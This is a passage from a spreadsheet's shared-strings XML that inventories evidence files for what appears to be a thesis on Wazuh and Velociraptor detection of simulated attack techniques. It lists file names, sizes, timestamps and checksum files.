    <t>6741</t>
  </si>
  <si>
    <t>F-0014</t>
  </si>
  <si>
    <t>P1_EVENT_TEC009_Sysmon_Context-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>24196</t>
  </si>
  <si>
    <t>F-0015</t>
  </si>
  <si>
    <t>TEC001_PowerShell_4104-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>51232</t>
  </si>
  <si>
    <t>F-0016</t>
  </si>
  <si>
    <t>TEC002_CMD_Sysmon-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>340408</t>
  </si>
  <si>
    <t>F-0017</t>
  </si>
  <si>
    <t>TEC003_ScheduledTask_Sysmon-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>99403</t>
  </si>
  <si>
    <t>F-0018</t>
  </si>
  <si>
    <t>TEC004_RunKey_Sysmon-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>65105</t>
  </si>
  <si>
    <t>F-0019</t>
  </si>
  <si>
    <t>TEC005_Service_System7045-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>7267</t>
  </si>
  <si>
    <t>F-0020</t>
  </si>
  <si>
    <t>TEC006_SecuritySoftwareDiscovery_4104-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>504925</t>
  </si>
  <si>
    <t>F-0021</t>
  </si>
  <si>
    <t>TEC006_SecuritySoftwareDiscovery_Sysmon-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>103622</t>
  </si>
  <si>
    <t>F-0022</t>
  </si>
  <si>
    <t>TEC007_DataEncryptedForImpact_4104-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>62595</t>
  </si>
  <si>
    <t>F-0023</t>
  </si>
  <si>
    <t>TEC008_DataDestruction_4104-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>5870</t>
  </si>
  <si>
    <t>F-0024</t>
  </si>
  <si>
    <t>TEC009_HTTP_Network_Sysmon_Context-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>25142</t>
  </si>
  <si>
    <t>F-0025</t>
  </si>
  <si>
    <t>TEC009_HTTP_Upload_Sysmon_Process_Context-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>21266</t>
  </si>
  <si>
    <t>F-0026</t>
  </si>
  <si>
    <t>TEC009_HTTP_ZIP_Upload_4104-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>6725</t>
  </si>
  <si>
    <t>F-0027</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260624_145022.log</t>
  </si>
  <si>
    <t>56971</t>
  </si>
  <si>
    <t>F-0028</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260624_145022_summary.csv</t>
  </si>
  <si>
    <t>27943</t>
  </si>
  <si>
    <t>F-0029</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260624_145022_summary.json</t>
  </si>
  <si>
    <t>63887</t>
  </si>
  <si>
    <t>F-0030</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260624_145022_summary.txt</t>
  </si>
  <si>
    <t>33063</t>
  </si>
  <si>
    <t>F-0031</t>
  </si>
  <si>
    <t>CU001_Source_TEC001_PowerShell_Basic-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>727298</t>
  </si>
  <si>
    <t>F-0032</t>
  </si>
  <si>
    <t>CU002_Source_TEC002_CMD_Basic-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>1105413</t>
  </si>
  <si>
    <t>F-0033</t>
  </si>
  <si>
    <t>CU003_Source_TEC003_ScheduledTask_Basic-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>183853</t>
  </si>
  <si>
    <t>F-0034</t>
  </si>
  <si>
    <t>CU004_Source_TEC004_RunKeys_Basic-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>109823</t>
  </si>
  <si>
    <t>F-0035</t>
  </si>
  <si>
    <t>CU005_Source_TEC005_ServiceCreation_7045-2026-06-23T12_00_00Z-2026-06-24T12_00_00Z-C.364907172793f8c7 (1).csv</t>
  </si>
  <si>
    <t>5994</t>
  </si>
  <si>
    <t>F-0036</t>
  </si>
  <si>
    <t>Forensic_EVENT_PowerShell4104_Strong_By_Technique-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>2150349</t>
  </si>
  <si>
    <t>F-0037</t>
  </si>
  <si>
    <t>Forensic_EVENT_Sysmon_ID1_Process_By_Technique-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>3792751</t>
  </si>
  <si>
    <t>F-0038</t>
  </si>
  <si>
    <t>13210</t>
  </si>
  <si>
    <t>F-0039</t>
  </si>
  <si>
    <t>20182</t>
  </si>
  <si>
    <t>F-0040</t>
  </si>
  <si>
    <t>38327</t>
  </si>
  <si>
    <t>F-0041</t>
  </si>
  <si>
    <t>TEC002_CMD_Sysmon-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>302290</t>
  </si>
  <si>
    <t>F-0042</t>
  </si>
  <si>
    <t>TEC003_ScheduledTask_Sysmon-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>104276</t>
  </si>
  <si>
    <t>F-0043</t>
  </si>
  <si>
    <t>TEC004_RunKey_Sysmon-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>63017</t>
  </si>
  <si>
    <t>F-0044</t>
  </si>
  <si>
    <t>4872</t>
  </si>
  <si>
    <t>F-0045</t>
  </si>
  <si>
    <t>TEC006_SecuritySoftwareDiscovery_4104-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>659538</t>
  </si>
  <si>
    <t>F-0046</t>
  </si>
  <si>
    <t>TEC006_SecuritySoftwareDiscovery_Sysmon-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>90936</t>
  </si>
  <si>
    <t>F-0047</t>
  </si>
  <si>
    <t>37632</t>
  </si>
  <si>
    <t>F-0048</t>
  </si>
  <si>
    <t>5052</t>
  </si>
  <si>
    <t>F-0049</t>
  </si>
  <si>
    <t>20982</t>
  </si>
  <si>
    <t>F-0050</t>
  </si>
  <si>
    <t>TEC009_HTTP_Upload_Sysmon_Process_Context-2026-06-25T12_00_00Z-2026-06-26T12_00_00Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>20018</t>
  </si>
  <si>
    <t>F-0051</t>
  </si>
  <si>
    <t>5483</t>
  </si>
  <si>
    <t>F-0052</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948.log</t>
  </si>
  <si>
    <t>2006</t>
  </si>
  <si>
    <t>F-0053</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948_summary.csv</t>
  </si>
  <si>
    <t>2944</t>
  </si>
  <si>
    <t>F-0054</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948_summary.json</t>
  </si>
  <si>
    <t>9214</t>
  </si>
  <si>
    <t>F-0055</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948_summary.txt</t>
  </si>
  <si>
    <t>1827</t>
  </si>
  <si>
    <t>F-0056</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948_vr_hits.csv</t>
  </si>
  <si>
    <t>145</t>
  </si>
  <si>
    <t>F-0057</t>
  </si>
  <si>
    <t>TFM_FP_20260626_101948_vr_hits.txt</t>
  </si>
  <si>
    <t>80</t>
  </si>
  <si>
    <t>F-0058</t>
  </si>
  <si>
    <t>fp_end_local.txt</t>
  </si>
  <si>
    <t>92</t>
  </si>
  <si>
    <t>F-0059</t>
  </si>
  <si>
    <t>fp_start_local.txt</t>
  </si>
  <si>
    <t>F-0060</t>
  </si>
  <si>
    <t>F-0061</t>
  </si>
  <si>
    <t>F-0062</t>
  </si>
  <si>
    <t>F-0063</t>
  </si>
  <si>
    <t>F-0064</t>
  </si>
  <si>
    <t>F-0065</t>
  </si>
  <si>
    <t>F-0066</t>
  </si>
  <si>
    <t>soc_alerts_fp_http_local_clean.jsonl</t>
  </si>
  <si>
    <t>F-0067</t>
  </si>
  <si>
    <t>base_custom_rule_check_110xxx.txt</t>
  </si>
  <si>
    <t>F-0068</t>
  </si>
  <si>
    <t>end_utc.txt</t>
  </si>
  <si>
    <t>21</t>
  </si>
  <si>
    <t>F-0069</t>
  </si>
  <si>
    <t>start_utc.txt</t>
  </si>
  <si>
    <t>F-0070</t>
  </si>
  <si>
    <t>wazuh_base_alerts_delta.jsonl</t>
  </si>
  <si>
    <t>160796</t>
  </si>
  <si>
    <t>F-0071</t>
  </si>
  <si>
    <t>wazuh_base_alerts_filtered.jsonl</t>
  </si>
  <si>
    <t>158062</t>
  </si>
  <si>
    <t>F-0072</t>
  </si>
  <si>
    <t>wazuh_base_archives_delta.jsonl</t>
  </si>
  <si>
    <t>2614459</t>
  </si>
  <si>
    <t>F-0073</t>
  </si>
  <si>
    <t>wazuh_base_summary.txt</t>
  </si>
  <si>
    <t>452</t>
  </si>
  <si>
    <t>F-0074</t>
  </si>
  <si>
    <t>wazuh_base_visibility_filtered.jsonl</t>
  </si>
  <si>
    <t>2246530</t>
  </si>
  <si>
    <t>F-0075</t>
  </si>
  <si>
    <t>status_wazuh_dashboard.txt</t>
  </si>
  <si>
    <t>13317</t>
  </si>
  <si>
    <t>F-0076</t>
  </si>
  <si>
    <t>status_wazuh_indexer.txt</t>
  </si>
  <si>
    <t>3463</t>
  </si>
  <si>
    <t>F-0077</t>
  </si>
  <si>
    <t>status_wazuh_manager.txt</t>
  </si>
  <si>
    <t>2221</t>
  </si>
  <si>
    <t>F-0078</t>
  </si>
  <si>
    <t>wazuh_agents.txt</t>
  </si>
  <si>
    <t>179</t>
  </si>
  <si>
    <t>F-0079</t>
  </si>
  <si>
    <t>wazuh_analysisd_test.txt</t>
  </si>
  <si>
    <t>F-0080</t>
  </si>
  <si>
    <t>ossec_manager.conf</t>
  </si>
  <si>
    <t>9387</t>
  </si>
  <si>
    <t>F-0081</t>
  </si>
  <si>
    <t>tfm_wazuh_custom_rules_v2.xml</t>
  </si>
  <si>
    <t>3204</t>
  </si>
  <si>
    <t>F-0082</t>
  </si>
  <si>
    <t>custom_rule_count_110xxx.txt</t>
  </si>
  <si>
    <t>110</t>
  </si>
  <si>
    <t>F-0083</t>
  </si>
  <si>
    <t>F-0084</t>
  </si>
  <si>
    <t>rule_110201_count.txt</t>
  </si>
  <si>
    <t>2</t>
  </si>
  <si>
    <t>F-0085</t>
  </si>
  <si>
    <t>sample_rule_110201.jsonl</t>
  </si>
  <si>
    <t>F-0086</t>
  </si>
  <si>
    <t>sample_rule_110202.jsonl</t>
  </si>
  <si>
    <t>44660</t>
  </si>
  <si>
    <t>F-0087</t>
  </si>
  <si>
    <t>sample_rule_110203.jsonl</t>
  </si>
  <si>
    <t>30091</t>
  </si>
  <si>
    <t>F-0088</t>
  </si>
  <si>
    <t>sample_rule_110301.jsonl</t>
  </si>
  <si>
    <t>4922</t>
  </si>
  <si>
    <t>F-0089</t>
  </si>
  <si>
    <t>sample_rule_110402.jsonl</t>
  </si>
  <si>
    <t>2785</t>
  </si>
  <si>
    <t>F-0090</t>
  </si>
  <si>
    <t>sample_rule_110501.jsonl</t>
  </si>
  <si>
    <t>27971</t>
  </si>
  <si>
    <t>F-0091</t>
  </si>
  <si>
    <t>F-0092</t>
  </si>
  <si>
    <t>tec009_alert_search_alerts.jsonl</t>
  </si>
  <si>
    <t>57256</t>
  </si>
  <si>
    <t>F-0093</t>
  </si>
  <si>
    <t>tec009_visibility_search_archives.jsonl</t>
  </si>
  <si>
    <t>256357</t>
  </si>
  <si>
    <t>F-0094</t>
  </si>
  <si>
    <t>tfm_wazuh_custom_detections_110xxx.jsonl</t>
  </si>
  <si>
    <t>314214</t>
  </si>
  <si>
    <t>F-0095</t>
  </si>
  <si>
    <t>wazuh_custom_alerts_delta.jsonl</t>
  </si>
  <si>
    <t>431533</t>
  </si>
  <si>
    <t>F-0096</t>
  </si>
  <si>
    <t>wazuh_custom_archives_delta.jsonl</t>
  </si>
  <si>
    <t>34524261</t>
  </si>
  <si>
    <t>F-0097</t>
  </si>
  <si>
    <t>wazuh_custom_summary.txt</t>
  </si>
  <si>
    <t>556</t>
  </si>
  <si>
    <t>F-0098</t>
  </si>
  <si>
    <t>wazuh_custom_visibility_filtered.jsonl</t>
  </si>
  <si>
    <t>34512874</t>
  </si>
  <si>
    <t>F-0099</t>
  </si>
  <si>
    <t>RESUMEN_FINAL_WAZUH_BASE_VS_CUSTOM.txt</t>
  </si>
  <si>
    <t>1407</t>
  </si>
  <si>
    <t>F-0100</t>
  </si>
  <si>
    <t>rutas_campanas.txt</t>
  </si>
  <si>
    <t>124</t>
  </si>
  <si>
    <t>F-0101</t>
  </si>
  <si>
    <t>SHA256SUMS.txt</t>
  </si>
  <si>
    <t>6000</t>
  </si>
  <si>
    <t>F-0102</t>
  </si>
  <si>
    <t>TFM_WAZUH_VISIBILIDAD_EVIDENCE.tar.gz.sha256</t>
  </si>
  <si>
    <t>104</t>
  </si>
  <si>
    <t>F-0103</t>
  </si>
  <si>
    <t>CLOSED_UTC.txt</t>
  </si>
  <si>
    <t>30</t>
  </si>
  <si>
    <t>F-0104</t>
  </si>
  <si>
    <t>FP_end_utc.txt</t>
  </si>
  <si>
    <t>F-0105</t>
  </si>
  <si>
    <t>FP_start_utc.txt</t>
  </si>
  <si>
    <t>F-0106</t>
  </si>
  <si>
    <t>SHA256.csv</t>
  </si>
  <si>
    <t>4386</t>
  </si>
  <si>
    <t>F-0107</t>
  </si>
  <si>
    <t>TEC_end_utc.txt</t>
  </si>
  <si>
    <t>F-0108</t>
  </si>
  <si>
    <t>TEC_start_utc.txt</t>
  </si>
  <si>
    <t>F-0109</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147.log</t>
  </si>
  <si>
    <t>2125</t>
  </si>
  <si>
    <t>F-0110</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147_summary.csv</t>
  </si>
  <si>
    <t>2995</t>
  </si>
  <si>
    <t>F-0111</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147_summary.json</t>
  </si>
  <si>
    <t>9480</t>
  </si>
  <si>
    <t>F-0112</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147_summary.txt</t>
  </si>
  <si>
    <t>1891</t>
  </si>
  <si>
    <t>F-0113</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0114</t>
  </si>
  <si>
    <t>TFM_FP_20260712_140147_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0115</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_135043.log</t>
  </si>
  <si>
    <t>57230</t>
  </si>
  <si>
    <t>F-0116</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_135043_summary.csv</t>
  </si>
  <si>
    <t>28204</t>
  </si>
  <si>
    <t>F-0117</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_135043_summary.json</t>
  </si>
  <si>
    <t>64160</t>
  </si>
  <si>
    <t>F-0118</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_135043_summary.txt</t>
  </si>
  <si>
    <t>33324</t>
  </si>
  <si>
    <t>F-0119</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation_FP.csv</t>
  </si>
  <si>
    <t>89205</t>
  </si>
  <si>
    <t>F-0120</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation_FP.json</t>
  </si>
  <si>
    <t>143980</t>
  </si>
  <si>
    <t>F-0121</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation_REAL.csv</t>
  </si>
  <si>
    <t>77666</t>
  </si>
  <si>
    <t>F-0122</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation_REAL.json</t>
  </si>
  <si>
    <t>125747</t>
  </si>
  <si>
    <t>F-0123</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation-2026-07-11T18_17_08Z-2026-07-12T18_17_08Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>F-0124</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation-2026-07-11T18_17_08Z-2026-07-12T18_17_08Z-C.364907172793f8c7.json</t>
  </si>
  <si>
    <t>F-0125</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation-2026-07-12T11_59_59Z-2026-07-12T12_10_10Z-C.364907172793f8c7.csv</t>
  </si>
  <si>
    <t>F-0126</t>
  </si>
  <si>
    <t>Windows.Events.ProcessCreation-2026-07-12T11_59_59Z-2026-07-12T12_10_10Z-C.364907172793f8c7.json</t>
  </si>
  <si>
    <t>F-0127</t>
  </si>
  <si>
    <t>F-0128</t>
  </si>
  <si>
    <t>F-0129</t>
  </si>
  <si>
    <t>F-0130</t>
  </si>
  <si>
    <t>F-0131</t>
  </si>
  <si>
    <t>F-0132</t>
  </si>
  <si>
    <t>F-0133</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757.log</t>
  </si>
  <si>
    <t>2014</t>
  </si>
  <si>
    <t>F-0134</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757_summary.csv</t>
  </si>
  <si>
    <t>F-0135</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757_summary.json</t>
  </si>
  <si>
    <t>9373</t>
  </si>
  <si>
    <t>F-0136</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757_summary.txt</t>
  </si>
  <si>
    <t>F-0137</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0138</t>
  </si>
  <si>
    <t>TFM_FP_20260712_143757_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0139</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_142613.log</t>
  </si>
  <si>
    <t>56864</t>
  </si>
  <si>
    <t>F-0140</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_142613_summary.csv</t>
  </si>
  <si>
    <t>27833</t>
  </si>
  <si>
    <t>F-0141</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_142613_summary.json</t>
  </si>
  <si>
    <t>63789</t>
  </si>
  <si>
    <t>F-0142</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_142613_summary.txt</t>
  </si>
  <si>
    <t>32953</t>
  </si>
  <si>
    <t>F-0143</t>
  </si>
  <si>
    <t>Windows.Events.ServiceCreation_FP.csv</t>
  </si>
  <si>
    <t>18</t>
  </si>
  <si>
    <t>F-0144</t>
  </si>
  <si>
    <t>Windows.Events.ServiceCreation_FP.json</t>
  </si>
  <si>
    <t>1114</t>
  </si>
  <si>
    <t>F-0145</t>
  </si>
  <si>
    <t>Windows.Events.ServiceCreation_REAL.csv</t>
  </si>
  <si>
    <t>1258</t>
  </si>
  <si>
    <t>F-0146</t>
  </si>
  <si>
    <t>Windows.Events.ServiceCreation_REAL.json</t>
  </si>
  <si>
    <t>F-0147</t>
  </si>
  <si>
    <t>F-0148</t>
  </si>
  <si>
    <t>F-0149</t>
  </si>
  <si>
    <t>F-0150</t>
  </si>
  <si>
    <t>F-0151</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541.log</t>
  </si>
  <si>
    <t>2010</t>
  </si>
  <si>
    <t>F-0152</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541_summary.csv</t>
  </si>
  <si>
    <t>2991</t>
  </si>
  <si>
    <t>F-0153</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541_summary.json</t>
  </si>
  <si>
    <t>9369</t>
  </si>
  <si>
    <t>F-0154</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541_summary.txt</t>
  </si>
  <si>
    <t>F-0155</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0156</t>
  </si>
  <si>
    <t>TFM_FP_20260712_145541_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0157</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_144616.log</t>
  </si>
  <si>
    <t>56742</t>
  </si>
  <si>
    <t>F-0158</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_144616_summary.csv</t>
  </si>
  <si>
    <t>27716</t>
  </si>
  <si>
    <t>F-0159</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_144616_summary.json</t>
  </si>
  <si>
    <t>63672</t>
  </si>
  <si>
    <t>F-0160</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_144616_summary.txt</t>
  </si>
  <si>
    <t>32836</t>
  </si>
  <si>
    <t>F-0161</t>
  </si>
  <si>
    <t>Windows.Sysinternals.SysmonLogForward_FP.csv</t>
  </si>
  <si>
    <t>175331</t>
  </si>
  <si>
    <t>F-0162</t>
  </si>
  <si>
    <t>Windows.Sysinternals.SysmonLogForward_FP.json</t>
  </si>
  <si>
    <t>161909</t>
  </si>
  <si>
    <t>F-0163</t>
  </si>
  <si>
    <t>Windows.Sysinternals.SysmonLogForward_REAL.csv</t>
  </si>
  <si>
    <t>138172</t>
  </si>
  <si>
    <t>F-0164</t>
  </si>
  <si>
    <t>Windows.Sysinternals.SysmonLogForward_REAL.json</t>
  </si>
  <si>
    <t>127567</t>
  </si>
  <si>
    <t>F-0165</t>
  </si>
  <si>
    <t>F-0166</t>
  </si>
  <si>
    <t>F-0167</t>
  </si>
  <si>
    <t>F-0168</t>
  </si>
  <si>
    <t>F-0169</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100.log</t>
  </si>
  <si>
    <t>F-0170</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100_summary.csv</t>
  </si>
  <si>
    <t>F-0171</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100_summary.json</t>
  </si>
  <si>
    <t>F-0172</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100_summary.txt</t>
  </si>
  <si>
    <t>F-0173</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0174</t>
  </si>
  <si>
    <t>TFM_FP_20260712_154100_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0175</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_152503.log</t>
  </si>
  <si>
    <t>56620</t>
  </si>
  <si>
    <t>F-0176</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_152503_summary.csv</t>
  </si>
  <si>
    <t>27593</t>
  </si>
  <si>
    <t>F-0177</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_152503_summary.json</t>
  </si>
  <si>
    <t>63549</t>
  </si>
  <si>
    <t>F-0178</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_152503_summary.txt</t>
  </si>
  <si>
    <t>32713</t>
  </si>
  <si>
    <t>F-0179</t>
  </si>
  <si>
    <t>Windows.Hayabusa.Monitoring_FP.csv</t>
  </si>
  <si>
    <t>3658383</t>
  </si>
  <si>
    <t>F-0180</t>
  </si>
  <si>
    <t>Windows.Hayabusa.Monitoring_FP.json</t>
  </si>
  <si>
    <t>3625078</t>
  </si>
  <si>
    <t>F-0181</t>
  </si>
  <si>
    <t>Windows.Hayabusa.Monitoring_REAL.csv</t>
  </si>
  <si>
    <t>832227</t>
  </si>
  <si>
    <t>F-0182</t>
  </si>
  <si>
    <t>Windows.Hayabusa.Monitoring_REAL.json</t>
  </si>
  <si>
    <t>799285</t>
  </si>
  <si>
    <t>F-0183</t>
  </si>
  <si>
    <t>F-0184</t>
  </si>
  <si>
    <t>F-0185</t>
  </si>
  <si>
    <t>F-0186</t>
  </si>
  <si>
    <t>F-0187</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220.log</t>
  </si>
  <si>
    <t>2011</t>
  </si>
  <si>
    <t>F-0188</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220_summary.csv</t>
  </si>
  <si>
    <t>2992</t>
  </si>
  <si>
    <t>F-0189</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220_summary.json</t>
  </si>
  <si>
    <t>9370</t>
  </si>
  <si>
    <t>F-0190</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220_summary.txt</t>
  </si>
  <si>
    <t>F-0191</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0192</t>
  </si>
  <si>
    <t>TFM_FP_20260712_163220_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0193</t>
  </si>
  <si>
    <t>Windows.ETW.Monitoring_FP.csv</t>
  </si>
  <si>
    <t>F-0194</t>
  </si>
  <si>
    <t>Windows.ETW.Monitoring_FP.json</t>
  </si>
  <si>
    <t>F-0195</t>
  </si>
  <si>
    <t>Windows.ETW.Monitoring-_REAL.csv</t>
  </si>
  <si>
    <t>F-0196</t>
  </si>
  <si>
    <t>Windows.ETW.Monitoring_REAL.json</t>
  </si>
  <si>
    <t>F-0197</t>
  </si>
  <si>
    <t>F-0198</t>
  </si>
  <si>
    <t>F-0199</t>
  </si>
  <si>
    <t>Generic.Events.TrackNetworkConnection_FP.json</t>
  </si>
  <si>
    <t>328865</t>
  </si>
  <si>
    <t>F-0200</t>
  </si>
  <si>
    <t>Generic.Events.TrackNetworkConnections_FP.csv</t>
  </si>
  <si>
    <t>312837</t>
  </si>
  <si>
    <t>F-0201</t>
  </si>
  <si>
    <t>Generic.Events.TrackNetworkConnections_REAL.csv</t>
  </si>
  <si>
    <t>217976</t>
  </si>
  <si>
    <t>F-0202</t>
  </si>
  <si>
    <t>Generic.Events.TrackNetworkConnections_REAL.json</t>
  </si>
  <si>
    <t>204323</t>
  </si>
  <si>
    <t>F-0203</t>
  </si>
  <si>
    <t>F-0204</t>
  </si>
  <si>
    <t>F-0205</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239.log</t>
  </si>
  <si>
    <t>2013</t>
  </si>
  <si>
    <t>F-0206</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239_summary.csv</t>
  </si>
  <si>
    <t>2994</t>
  </si>
  <si>
    <t>F-0207</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239_summary.json</t>
  </si>
  <si>
    <t>9372</t>
  </si>
  <si>
    <t>F-0208</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239_summary.txt</t>
  </si>
  <si>
    <t>F-0209</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239_vr_hits.csv</t>
  </si>
  <si>
    <t>F-0210</t>
  </si>
  <si>
    <t>TFM_FP_20260712_165239_vr_hits.txt</t>
  </si>
  <si>
    <t>F-0211</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_164312.log</t>
  </si>
  <si>
    <t>F-0212</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_164312_summary.csv</t>
  </si>
  <si>
    <t>27592</t>
  </si>
  <si>
    <t>F-0213</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_164312_summary.json</t>
  </si>
  <si>
    <t>63548</t>
  </si>
  <si>
    <t>F-0214</t>
  </si>
  <si>
    <t>TFM_TEC_Run_CANDIDATE_v5_20260712_164312_summary.txt</t>
  </si>
  <si>
    <t>32712</t>
  </si>
  <si>
    <t>F-0215</t>
  </si>
  <si>
    <t>TFM_WAZUH_VISIBILIDAD_EVIDENCE.tar.gz</t>
  </si>
  <si>
    <t>1990280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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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WAZUH.docx</t>
  </si>
  <si>
    <t>1354384</t>
  </si>
  <si>
    <t>F-0225</t>
  </si>
  <si>
    <t>yaml</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\Custom.TFM.HIDS.P1.Critical.Priority.Event_v1.yaml</t>
  </si>
  <si>
    <t>2026-06-24T12:32:25.1824130Z</t>
  </si>
  <si>
    <t>ARTIFACT_VALIDADO</t>
  </si>
  <si>
